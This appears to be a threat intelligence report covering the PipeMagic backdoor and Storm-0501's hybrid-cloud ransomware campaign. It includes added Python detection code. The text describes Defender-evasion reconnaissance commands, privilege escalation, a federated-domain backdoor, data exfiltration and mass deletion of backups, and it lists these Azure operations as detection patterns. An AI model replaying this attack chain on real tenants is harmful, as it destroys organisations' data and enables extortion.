0x15 | arg1: Module index; arg2: New module name; arg3: New module attribute; arg4: Module hash length; arg5: Module hash; arg6: Module data length; arg7: Module data | Replaces a module node in the payload linked list with a new one; the provided data is RC4-decrypted, aPLib-decompressed, and validated by SHA-1 hash before being added to the payload module node
0x16 | N/A | Recollects system information (same as the initial C2 handshake)
0x17 | arg1: Module index; arg2: Pipe data 1; arg3: Pipe data 2; arg4: Max elapsed time; arg5: Pipe name | Extracts and RC4-encrypts data from a module in the payload linked list and sends it to a named pipe along with the provided pipe data
Backdoor results are delivered to C2 over TCP. These inner backdoor codes provide the threat actor with granular control over module management, execution, and system reconnaissance, making PipeMagic a highly modular and extensible backdoor.
Backdoor capabilities: Unknown linked list
Processing code 0x8 functions similarly to processing code 0x1 in that it also contains inner backdoor code and data. However, this command is specifically designed to interact with the unknown linked list.
The purpose of this linked list remains unclear. It does not appear to play a critical role in the malware’s core functionality on the infected system. Below is a list of known backdoor codes associated with this processing command and their corresponding functionalities:
Backdoor code | Backdoor arguments | Functionality
0x1 | N/A | Retrieves metadata from all module nodes in the unknown linked list
0x2 | arg1: Module index | Looks up a module node in the unknown linked list and extracts its data
0x3 | arg1: Module index | Deletes a module node from the unknown linked list using the specified index
0x7 | arg1: Module index; arg2: New module size | Resizes the data buffer of a module node in the unknown linked list, either expanding or shrinking it based on the provided size
While the exact role of this list remains unclear, its structure and command handling mirror those of the payload and execute linked lists, suggesting it may serve as a staging area or auxiliary buffer for dynamically loaded modules.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of activity associated with PipeMagic and Storm-2460:
Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects this threat as the following malware:
PipeMagic (Win32/64)
Microsoft Defender for Endpoint
The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:
‘PipeMagic’ malware was detected
‘PipeMagic’ malware was prevented
An active ‘PipeMagic’ malware was blocked
An active ‘PipeMagic’ malware process was detected while executing and terminated
The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.
A file or network connection related to a ransomware-linked emerging threat activity group detected
Microsoft Defender Vulnerability Management
Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:
CVE-2025-29824
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.
Microsoft Threat Intelligence has observed financially motivated threat actor Storm-0501 continuously evolving their campaigns to achieve sharpened focus on cloud-based tactics, techniques, and procedures (TTPs). While the threat actor has been known for targeting hybrid cloud environments, their primary objective has shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.
Unlike traditional on-premises ransomware, where the threat actor typically deploys malware to encrypt critical files across endpoints within the compromised network and then negotiates for a decryption key, cloud-based ransomware introduces a fundamental shift. Leveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom—all without relying on traditional malware deployment.
Storm-0501’s targeting is opportunistic. The threat actor initially deployed Sabbath ransomware in an attack against United States school districts in 2021. In November 2023, the actor targeted the healthcare sector. Over the years, the actor switched ransomware payloads multiple times, using Embargo ransomware in 2024 attacks.
In September 2024, we published a blog detailing how Storm-0501 extended its on-premises ransomware operations into hybrid cloud environments. The threat actor gained a foothold by compromising Active Directory environments and then pivoted to Microsoft Entra ID, escalating privileges on hybrid and cloud identities to gain global administrator privileges. The impact phase of these attacks took one of two forms: implanting backdoors in Entra ID tenant configurations using maliciously added federated domains to allow sign-in as nearly any user or deploying on-premises ransomware to encrypt endpoints and servers, eventually demanding ransom for the decryption keys.
Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows. They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals.
In this blog post, we describe the impact of a recent Storm-0501 attack on a compromised cloud environment. We trace how the threat actor achieved cloud-based ransomware impact through cloud privilege escalation, taking advantage of protection and visibility gaps across the compromised environment, and pivoting from on-premises to the cloud. Understanding how such attacks are conducted is critical in protecting cloud environments. Below we share protection and mitigation recommendations, including strengthening protections for cloud identities and cloud resources, and detection guidance across Microsoft security solutions to help organizations harden their networks against these attacks.
Figure 1. Overview of Storm-0501 cloud-based ransomware attack chain
On-premises compromise and pivot to the cloud
In a recent campaign, Storm-0501 compromised a large enterprise composed of multiple subsidiaries, each operating its own Active Directory domain. These domains are interconnected through domain trust relationships, enabling cross-domain authentication and resource access.
The cloud environment mirrors this complexity. Different subsidiaries maintain separate Microsoft Azure tenants, with varying Microsoft Defender product coverage. Notably, only one tenant had Microsoft Defender for Endpoint deployed, and devices from multiple Active Directory domains were onboarded to this single tenant’s license. This fragmented deployment created visibility gaps across the environment.
Active Directory domains were synchronized to several Entra ID tenants using Entra Connect Sync servers. In some cases, a single domain was synced to more than one tenant, further complicating identity management and monitoring. For clarity, this blog focuses on the two tenants impacted by the attack: one where on-premises activity was observed, and another where cloud-based activity occurred.
Figure 2. Storm-0501 on-premises attack chain
On-premises activity
For the purposes of this blog, we focus our analysis on the post-compromise phase of the on-premises attack, meaning that the threat actor had already achieved domain administrator privileges in the targeted domain. Read our previous blog for a more comprehensive overview of Storm-0501 tactics in on-premises environments.
The limited deployment of Microsoft Defender for Endpoint across the environment significantly hindered detection. Of the multiple compromised domains, only one domain had significant Defender for Endpoint deployment, leaving portions of the network unmonitored. On the few onboarded devices where Storm-0501 activity was observed, we noted that the threat actor conducted reconnaissance before executing malicious actions. Specifically, the threat actor used the following commands:
sc query sense
sc query windefend
The threat actor checked for the presence of Defender for Endpoint services, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems. This highlights the importance of comprehensive endpoint coverage.
Lateral movement was facilitated using Evil-WinRM, a post-exploitation tool that uses PowerShell over Windows Remote Management (WinRM) for remote code execution. The commands above were run in sessions opened with the tool, alongside discovery with other common native Windows tools and commands such as quser.exe and net.exe. Earlier in the attack, the threat actor had compromised an Entra Connect Sync server that was not onboarded to Defender for Endpoint. We assess that this server served as a pivot point, with the threat actor establishing a tunnel through it to move laterally within the network.
The threat actor also performed a DCSync attack, a technique that abuses the Directory Replication Service (DRS) Remote Protocol to simulate the behavior of a domain controller. By impersonating a domain controller, the threat actor could request password hashes for any user in the domain, including privileged accounts. This technique is often used to extract credentials without triggering traditional authentication-based alerts.
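As an added illustration, not part of the original post, the following Python checks Windows Security event 4662 records for the replication control-access rights a DCSync request has to exercise on the domain object, which is how a domain-controller-side "possible source of DCSync" check works. It assumes Directory Service Access auditing is enabled with a SACL on the domain naming context; the events, hostnames and the sync service-account name are constructed placeholders.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not part of the original post. Assumes "Audit Directory
Service Access" is enabled and the domain naming context has a SACL that
audits the replication control access rights. All events are constructed.
"""
from dataclasses import dataclass

# Control access right GUIDs a DCSync request exercises on the domain object.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# ObjectType is logged either by class name or by the domainDNS schema GUID.
DOMAIN_OBJECT_TYPES = {"domaindns", "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"}


@dataclass
class Event4662:
    subject_user: str   # SubjectUserName, e.g. "DC01$" or "jdoe"
    object_type: str    # ObjectType field
    properties: str     # Properties field: access names and right GUIDs
    computer: str       # domain controller that logged the event


def replication_rights_in(properties):
    """Names of the replication rights referenced in the Properties field."""
    text = properties.lower()
    return {name for guid, name in REPLICATION_RIGHTS.items() if guid in text}


def is_domain_controller(account, dc_hostnames):
    """Machine accounts are HOST$; only real DCs may legitimately replicate."""
    known = {h.upper() for h in dc_hostnames}
    return account.endswith("$") and account[:-1].upper() in known


def detect_dcsync(events, dc_hostnames, replication_allowed=frozenset()):
    """Findings for events where a non-DC principal requested replication.

    replication_allowed: principals that replicate by design, such as the
    Entra Connect service account (hypothetical name in the sample). They are
    reported at lower severity rather than dropped: Storm-0501 pivoted through
    exactly such a server, so silencing it would hide the attack.
    """
    findings = []
    for ev in events:
        rights = replication_rights_in(ev.properties)
        if not rights or ev.object_type.lower() not in DOMAIN_OBJECT_TYPES:
            continue
        if is_domain_controller(ev.subject_user, dc_hostnames):
            continue
        severity = "medium" if ev.subject_user.lower() in replication_allowed else "high"
        findings.append({"subject": ev.subject_user, "severity": severity,
                         "rights": sorted(rights), "dc": ev.computer})
    return findings


BOTH = "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
# Constructed sample: DC-to-DC replication, the (hypothetical) sync service
# account, an ordinary user running DCSync, and an unrelated property read.
SAMPLE_EVENTS = [
    Event4662("DC02$", "domainDNS", BOTH, "DC01"),
    Event4662("svc_aadconnect", "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
              "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "DC01"),
    Event4662("jdoe", "domainDNS", BOTH, "DC01"),
    Event4662("jdoe", "user", "Read Property", "DC01"),
]


def run_sample():
    return detect_dcsync(SAMPLE_EVENTS, {"DC01", "DC02"}, frozenset({"svc_aadconnect"}))


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f['severity']}] {f['subject']} requested {', '.join(f['rights'])} via {f['dc']}")
```

The DC allow-list is keyed on machine-account names rather than on group membership because a compromised domain admin can add any account to the replication ACL; the list of real domain controllers changes far less often.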
Pivot to the cloud
Following the on-premises compromise of the first tenant, the threat actor leveraged the Entra Connect Sync Directory Synchronization Account (DSA) to enumerate users, roles, and Azure resources within the tenant. This reconnaissance was performed using AzureHound, a tool designed to map relationships and permissions in Azure environments and consequently find potential attack paths and escalations.
Shortly thereafter, the threat actor attempted to sign in as several privileged users. These attempts were unsuccessful, blocked by Conditional Access policies and multifactor authentication (MFA) requirements. This suggests that while Storm-0501 had valid credentials, they lacked the necessary second factor or were unable to satisfy policy conditions.
Undeterred, Storm-0501 shifted tactics. Leveraging their foothold in the Active Directory environment, they traversed between Active Directory domains and eventually moved laterally to compromise a second Entra Connect server associated with a different Entra ID tenant and Active Directory domain. The threat actor extracted that server's Directory Synchronization Account credentials and repeated the reconnaissance process, this time targeting identities and resources in the second tenant.
Identity escalation
The discovery phase, in which the threat actor used on-premises control to pivot across Active Directory domains and enumerate cloud resources at scale, gave them a detailed view of the organization's security posture. They identified a non-human synced identity that held the Global Administrator role in Microsoft Entra ID on that tenant and had no registered MFA method. Because the account was mastered on-premises, the threat actor could reset its Active Directory password, and the Entra Connect Sync service, configured in the most common mode, Password Hash Synchronization (PHS), legitimately synced the new password hash to the cloud identity shortly afterwards. In the cloud audit trail this password change is attributed to the Entra Connect Directory Synchronization Account (DSA). Consequently, the threat actor was able to authenticate to Entra ID as that user with the new password.
Since no MFA method was registered for that user, after authenticating with the newly assigned password the threat actor was simply prompted to register a new MFA method, which they did with a method under their control. From then on, the compromised user had a registered MFA method that allowed the threat actor to satisfy MFA requirements and comply with the customer's per-resource Conditional Access policies.
To access the Azure portal with the compromised Global Administrator account, the threat actor had to satisfy one more condition enforced by the Conditional Access policy for that resource: authentication had to originate from a Microsoft Entra hybrid joined device, that is, a device joined to both the Active Directory domain and Entra ID. We observed failed authentication attempts from company devices that were only domain-joined or only Entra-joined and therefore did not meet the condition. The threat actor moved laterally between devices in the network until we observed a successful sign-in to the Azure portal with the Global Administrator account from a server that was hybrid joined.
Once the threat actor was able to satisfy the Conditional Access policies and sign in to the Azure portal as a Global Administrator, Storm-0501 effectively had full control over the tenant. They then used the highest available cloud privileges to pursue their goals in the cloud.
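The chain above (on-premises password reset of a synced account, PHS carrying it to the cloud, first sign-in registering MFA) leaves a correlatable trail. The following Python is an added example, not code from the post: it reports synced privileged accounts with no MFA method as a posture finding and correlates a DSA-attributed password change with a subsequent security-info registration and a sign-in from an IP never seen for that account. The record shapes, the activity names, the Sync_ UPN prefix and all sample data are assumptions constructed for the example.

```python
"""Correlate the hybrid identity-escalation chain described above.

Added example, not part of the original post. Records are simplified
stand-ins for Entra audit-log and sign-in entries plus a user inventory;
activity names, the DSA UPN prefix and all data are constructed assumptions.
"""
from datetime import datetime, timedelta

PRIVILEGED_ROLES = {"Global Administrator", "Privileged Role Administrator"}
DSA_UPN_PREFIX = "sync_"   # assumed: DSA UPNs look like Sync_<server>_<id>@...


def posture_findings(users):
    """Synced accounts holding a privileged role with no MFA method registered.

    This is the precondition the actor relied on: an on-premises password
    reset flows to the cloud through PHS and the next sign-in is free to
    register MFA. Cloud-native admins with MFA registered do not show up.
    """
    return sorted(
        u["upn"] for u in users
        if u["onPremisesSyncEnabled"]
        and set(u["roles"]) & PRIVILEGED_ROLES
        and not u["mfaMethods"]
    )


def _ts(rec):
    return datetime.fromisoformat(rec["time"])


def escalation_chains(events, window=timedelta(hours=24)):
    """Password change on a user attributed to the DSA, followed within
    `window` by that user registering security info and signing in from an
    IP not seen for it before the reset. One finding per matching reset."""
    by_user = {}
    for ev in sorted(events, key=_ts):
        by_user.setdefault(ev["target"], []).append(ev)
    findings = []
    for user, evs in by_user.items():
        for reset in evs:
            if reset["activity"] != "Change user password":
                continue
            if not reset["initiatedBy"].lower().startswith(DSA_UPN_PREFIX):
                continue
            t0 = _ts(reset)
            before = [e for e in evs if _ts(e) <= t0]
            after = [e for e in evs if t0 < _ts(e) <= t0 + window]
            registered = any(e["activity"] == "User registered security info" for e in after)
            known_ips = {e["ip"] for e in before if e["activity"] == "Sign-in"}
            new_ip = [e for e in after if e["activity"] == "Sign-in" and e["ip"] not in known_ips]
            if registered and new_ip:
                findings.append({"user": user, "reset_at": reset["time"], "from_ip": new_ip[0]["ip"]})
    return findings


# Constructed inventory and events; names and addresses are placeholders.
USERS = [
    {"upn": "svc-backup@corp.example", "onPremisesSyncEnabled": True,
     "roles": ["Global Administrator"], "mfaMethods": []},
    {"upn": "admin-cloud@corp.example", "onPremisesSyncEnabled": False,
     "roles": ["Global Administrator"], "mfaMethods": ["fido2"]},
    {"upn": "jdoe@corp.example", "onPremisesSyncEnabled": True, "roles": [], "mfaMethods": []},
]
DSA = "Sync_SRV01_9f3c@corp.onmicrosoft.com"
EVENTS = [
    {"time": "2025-05-01T08:00:00", "activity": "Sign-in", "target": "svc-backup@corp.example",
     "initiatedBy": "svc-backup@corp.example", "ip": "10.10.5.20"},
    {"time": "2025-05-10T02:10:00", "activity": "Change user password", "target": "svc-backup@corp.example",
     "initiatedBy": DSA, "ip": "10.10.5.21"},
    {"time": "2025-05-10T02:14:00", "activity": "User registered security info",
     "target": "svc-backup@corp.example", "initiatedBy": "svc-backup@corp.example", "ip": "198.51.100.9"},
    {"time": "2025-05-10T02:16:00", "activity": "Sign-in", "target": "svc-backup@corp.example",
     "initiatedBy": "svc-backup@corp.example", "ip": "198.51.100.9"},
    # Routine PHS sync of an ordinary user's password change: no MFA
    # registration follows, so it is not reported even though the IP is new.
    {"time": "2025-05-10T09:00:00", "activity": "Change user password", "target": "jdoe@corp.example",
     "initiatedBy": DSA, "ip": "10.10.5.21"},
    {"time": "2025-05-10T09:05:00", "activity": "Sign-in", "target": "jdoe@corp.example",
     "initiatedBy": "jdoe@corp.example", "ip": "10.10.7.33"},
]


def run_sample():
    return posture_findings(USERS), escalation_chains(EVENTS)


if __name__ == "__main__":
    exposed, chains = run_sample()
    print("synced privileged accounts without MFA:", exposed)
    for c in chains:
        print(f"{c['user']}: DSA password change at {c['reset_at']}, MFA registered, sign-in from {c['from_ip']}")
```

Requiring all three steps keeps routine PHS password syncs out of the findings; the posture check alone is what should drive remediation, since it identifies the accounts that make the chain possible.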
Figure 3. Storm-0501 cloud identity and cloud environment compromise leading to extortion
Cloud identity compromise: Entra ID
Cloud persistence
Following successful authentication as a Global Administrator to the tenant, Storm-0501 immediately established a persistence mechanism. As seen in the threat actor's previous activity, Storm-0501 created a backdoor by maliciously adding a federated domain, enabling them to sign in as almost any user, selected through the ImmutableId user property. The threat actor used the Global Administrator role privileges and the AADInternals tool to register a threat actor-owned Entra ID tenant as a federated domain trusted by the targeted tenant. To establish the trust, a threat actor-generated root certificate is provided to the victim tenant, which then accepts authentication requests signed with it and coming from the threat actor-owned tenant. The backdoor enabled Storm-0501 to craft security assertion markup language (SAML) tokens valid for the victim tenant, impersonating its users while assuming the impersonated user's Microsoft Entra roles.
Cloud compromise: Azure
Azure initial access and privilege escalation
A tenant's Entra ID and Azure environments are intertwined, and since Storm-0501 had gained top-level Entra ID privileges, they could proceed to their final goal: using cloud-based ransomware tactics for monetary gain. To achieve it, they had to find the organization's valuable data stores, which resided in the cloud, in Azure.
Because they had compromised a user with the Microsoft Entra Global Administrator role, the only step needed to enter the Azure environment was to elevate that account's access to Azure resources by invoking the Microsoft.Authorization/elevateAccess/action operation. This granted them the User Access Administrator Azure role at the root scope, that is, over all the organization's Azure subscriptions, including all the valuable data residing inside them.
To freely operate within the environment, the threat actor assigned themselves the Owner Azure role over all the Azure subscriptions available by invoking the Microsoft.Authorization/roleAssignments/write operation.
Discovery
After taking control of the organization's Azure environment, the threat actor, we assess, initiated a comprehensive discovery phase using various techniques, including the AzureHound tool, to locate the organization's critical assets: data stores containing sensitive information and the resources used to back up on-premises and cloud endpoint devices. The threat actor mapped the Azure environment, including the protections in place, such as Azure Policy assignments, resource locks, and Azure Storage immutability policies.
Defense evasion
The threat actor then targeted the organization's Azure Storage accounts. Using the public access features in Azure Storage, Storm-0501 exposed storage accounts that had not been remotely reachable to the internet and to their own infrastructure, paving the way for the exfiltration phase. To modify the storage account resources, the threat actor abused the Microsoft.Storage/storageAccounts/write operation.
Credential access
For Azure Storage accounts with shared key access enabled, the threat actor abused their Azure Owner role to retrieve the account access keys through the Microsoft.Storage/storageAccounts/listKeys/action operation.
Exfiltration
After exposing the Azure Storage accounts, the threat actor exfiltrated their data to attacker-controlled infrastructure using the AzCopy command-line tool.
Impact
In on-premises ransomware, the threat actor typically deploys malware that encrypts crucial files on as many endpoints as possible, then negotiates with the victim for the decryption key. In cloud-based ransomware attacks, cloud features and capabilities give the threat actor the capability to quickly exfiltrate and transmit large amounts of data from the victim environment to their own infrastructure, destroy the data and backup cloud resources in the victim cloud environment, and then demand the ransom.
After completing the exfiltration phase, Storm-0501 initiated the mass deletion of the Azure resources containing the victim organization's data, preventing the victim from remediating by restoring it. They did so by abusing the following Azure operations across multiple resource providers:
Microsoft.Compute/snapshots/delete – Deletes an Azure snapshot: a read-only, point-in-time copy of an Azure VM disk (VHD) that captures its state and data at a specific moment, exists independently of the source disk, and can be used as a backup or clone of that disk.
Microsoft.Compute/restorePointCollections/delete – Deletes the Azure VM Restore Point, which stores virtual machines (VM) configuration and point-in-time application-consistent snapshots of all the managed disks attached to the VM.
Microsoft.Storage/storageAccounts/delete – Deletes an Azure storage account, which holds an organization's Azure Storage data objects: blobs, files, queues, and tables. In all the Storm-0501 Azure campaigns we investigated, this is where the actor focused most of their effort, deleting as many storage accounts as possible in the environment.
Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete – Deletes an Azure recovery services vault protection container. A protection container is a logical grouping of resources (like VMs or workloads) that can be backed up together, within the Recovery Services vault.
During the attempts to mass-delete these data stores, the threat actor hit errors and failed to delete some resources because of existing protections in the environment, namely Azure resource locks and Azure Storage immutability policies. They then attempted to remove these protections using the following operations:
Microsoft.Authorization/locks/delete – Deletes Azure resource locks, which prevent accidental deletion or modification of Azure subscriptions, resource groups, or resources. A lock applies regardless of the caller's role assignments; only principals holding the Microsoft.Authorization/locks/* permission, such as Owner or User Access Administrator, can remove it, which is why the actor's Owner assignment mattered here.
Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete – Deletes Azure storage immutability policies, which protect blob data from being overwritten or deleted.
After successfully deleting multiple resource locks and immutability policies, the threat actor resumed the mass deletion of the Azure data stores, erasing resources across several Azure subscriptions. For the resources that remained protected by immutability policies, the actor turned to cloud-based encryption.
To do so, Storm-0501 created a new Azure Key Vault and a new customer-managed key inside it, intended to encrypt the remaining Azure Storage accounts through the Azure Storage encryption scopes feature:
Microsoft.KeyVault/vaults/write – Creates or modifies an existing Azure Key Vault. The threat actor creates a new Azure key vault to host the encryption key.
Microsoft.Storage/storageAccounts/encryptionScopes/write – Creates or modifies Azure storage encryption scopes, which manage encryption with a key that is scoped to a container or an individual blob. When you define an encryption scope, you can specify whether the scope is protected with a Microsoft-managed key or with a customer-managed key that is stored in Azure Key Vault.
The threat actor abused the encryption scopes feature to encrypt blobs in the Azure Storage accounts. On its own this was not sufficient, as the organization could still read the data with the appropriate Azure permissions, so to make the data inaccessible the actor deleted the key used for the encryption. However, Azure Key Vault and the keys it holds are protected by the soft-delete feature, with a default retention period of 90 days, during which the deleted key or vault can be recovered; this undercuts cloud-based encryption for ransomware purposes. Note that soft delete alone does not stop a principal with purge permission from purging the deleted key; purge protection, covered in the mitigation guidance below, closes that gap.
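The deletion-and-encryption sequence above maps onto a handful of Activity log operations, so it can be scored per caller. The following Python is an added example, not from the post or from Microsoft: it weights the operations listed above, tracks whether a caller elevated access, and specifically catches the pattern the actor hit, a delete that failed on a lock or immutability policy followed by removal of that protection and a successful retry. The weights, the threshold, the record shape and all sample records are this example's own constructed assumptions.

```python
"""Score Azure control-plane activity for the deletion-and-encryption chain above.

Added example, not part of the original post. Records are simplified Azure
Activity log entries (time, operationName, caller, status, resourceId); the
weights are this example's own choice and all sample data is constructed.
"""
from collections import defaultdict

# Operations named in the post, with a stage and an example weight.
STAGES = {
    "microsoft.authorization/elevateaccess/action": ("privilege_escalation", 5),
    "microsoft.authorization/roleassignments/write": ("privilege_escalation", 3),
    "microsoft.storage/storageaccounts/write": ("defense_evasion", 2),
    "microsoft.storage/storageaccounts/listkeys/action": ("credential_access", 2),
    "microsoft.authorization/locks/delete": ("defense_evasion", 4),
    "microsoft.storage/storageaccounts/blobservices/containers/immutabilitypolicies/delete": ("defense_evasion", 5),
    "microsoft.compute/snapshots/delete": ("impact", 3),
    "microsoft.compute/restorepointcollections/delete": ("impact", 3),
    "microsoft.storage/storageaccounts/delete": ("impact", 4),
    "microsoft.recoveryservices/vaults/backupfabrics/protectioncontainers/delete": ("impact", 4),
    "microsoft.keyvault/vaults/write": ("impact", 1),
    "microsoft.storage/storageaccounts/encryptionscopes/write": ("impact", 3),
}
DESTRUCTIVE_OPS = {op for op, (s, _) in STAGES.items() if s == "impact" and op.endswith("/delete")}
PROTECTION_OPS = {op for op, (s, _) in STAGES.items() if s == "defense_evasion" and op.endswith("/delete")}


def protection_removal_chains(records):
    """Failed delete of a resource, then a lock or immutability policy scoped
    under it removed, then the delete retried successfully. Both a lock's and
    an immutability policy's resourceId start with the protected resource's
    id, so a prefix match links the three records."""
    recs = sorted(records, key=lambda r: r["time"])
    chains = []
    for i, rec in enumerate(recs):
        op = rec["operationName"].lower()
        if op not in DESTRUCTIVE_OPS or rec["status"] != "Failed":
            continue
        target, removed = rec["resourceId"].lower(), None
        for later in recs[i + 1:]:
            lop, lid = later["operationName"].lower(), later["resourceId"].lower()
            if later["status"] != "Succeeded":
                continue
            if removed is None and lop in PROTECTION_OPS and lid.startswith(target):
                removed = later
            elif removed is not None and lop == op and lid == target:
                chains.append({"caller": later["caller"], "resource": rec["resourceId"],
                               "protection_removed": removed["operationName"]})
                break
    return chains


def score_callers(records, threshold=12):
    """Per caller: weight of successful operations, stages touched, whether it
    elevated access, and how many protections it stripped to finish a delete."""
    acc = defaultdict(lambda: {"score": 0, "stages": set(), "elevated": False})
    for rec in records:
        op = rec["operationName"].lower()
        if op not in STAGES or rec["status"] != "Succeeded":
            continue
        stage, weight = STAGES[op]
        entry = acc[rec["caller"]]
        entry["score"] += weight
        entry["stages"].add(stage)
        entry["elevated"] |= op == "microsoft.authorization/elevateaccess/action"
    chains = protection_removal_chains(records)
    result = {}
    for caller, entry in acc.items():
        stripped = sum(1 for c in chains if c["caller"] == caller)
        suspicious = (entry["score"] >= threshold or stripped > 0
                      or (entry["elevated"] and "impact" in entry["stages"]))
        result[caller] = {"score": entry["score"], "stages": sorted(entry["stages"]),
                          "protections_stripped": stripped, "suspicious": suspicious}
    return result


SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
SA1 = f"{SUB}/resourceGroups/rg-data/providers/Microsoft.Storage/storageAccounts/stbackups01"
SNAP = f"{SUB}/resourceGroups/rg-vm/providers/Microsoft.Compute/snapshots/vm01-osdisk-snap"
ATTACKER, OPERATOR = "svc-backup@corp.example", "ops-admin@corp.example"


def _r(time, op, caller, status, resource_id):
    return {"time": time, "operationName": op, "caller": caller, "status": status, "resourceId": resource_id}


# Constructed: elevate, grant Owner, expose and dump keys of a storage account,
# fail to delete it, strip its lock, delete it, remove a snapshot; then one
# routine snapshot removal by an operator.
SAMPLE = [
    _r("2025-05-10T03:00:00", "Microsoft.Authorization/elevateAccess/action", ATTACKER, "Succeeded", "/providers/Microsoft.Authorization"),
    _r("2025-05-10T03:02:00", "Microsoft.Authorization/roleAssignments/write", ATTACKER, "Succeeded", f"{SUB}/providers/Microsoft.Authorization/roleAssignments/ra1"),
    _r("2025-05-10T03:10:00", "Microsoft.Storage/storageAccounts/write", ATTACKER, "Succeeded", SA1),
    _r("2025-05-10T03:11:00", "Microsoft.Storage/storageAccounts/listKeys/action", ATTACKER, "Succeeded", SA1),
    _r("2025-05-10T05:30:00", "Microsoft.Storage/storageAccounts/delete", ATTACKER, "Failed", SA1),
    _r("2025-05-10T05:31:00", "Microsoft.Authorization/locks/delete", ATTACKER, "Succeeded", f"{SA1}/providers/Microsoft.Authorization/locks/DoNotDelete"),
    _r("2025-05-10T05:32:00", "Microsoft.Storage/storageAccounts/delete", ATTACKER, "Succeeded", SA1),
    _r("2025-05-10T05:40:00", "Microsoft.Compute/snapshots/delete", ATTACKER, "Succeeded", SNAP),
    _r("2025-05-10T07:00:00", "Microsoft.Compute/snapshots/delete", OPERATOR, "Succeeded", SNAP),
]


def run_sample():
    return score_callers(SAMPLE)
```

Failed operations deliberately do not add to the score but do seed the chain search: a failed delete is an ordinary mistake on its own, and only becomes a signal once the caller removes the protection that caused it and tries again.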
After successfully exfiltrating and destroying the data within the Azure environment, the threat actor initiated the extortion phase, where they contacted the victims using Microsoft Teams using one of the previously compromised users, demanding ransom.
Mitigation and protection guidance
Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks to escalate privileges. Additionally, a new version released in May 2025 introduces modern authentication, allowing customers to configure application-based authentication for enhanced security (currently in public preview). It is also important to enable Trusted Platform Module (TPM) on the Entra Connect Sync server to securely store sensitive credentials and cryptographic keys, mitigating Storm-0501’s credential extraction techniques.
The techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:
Protecting on-premises
Turn on tamper protection features to prevent threat actors from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Turn on automated investigation and remediation in full automated mode so that Defender for Endpoint can take immediate action on alerts, significantly reducing alert volume.
Protecting cloud identities
Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID and Azure environments to slow or stop threat actors.
Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
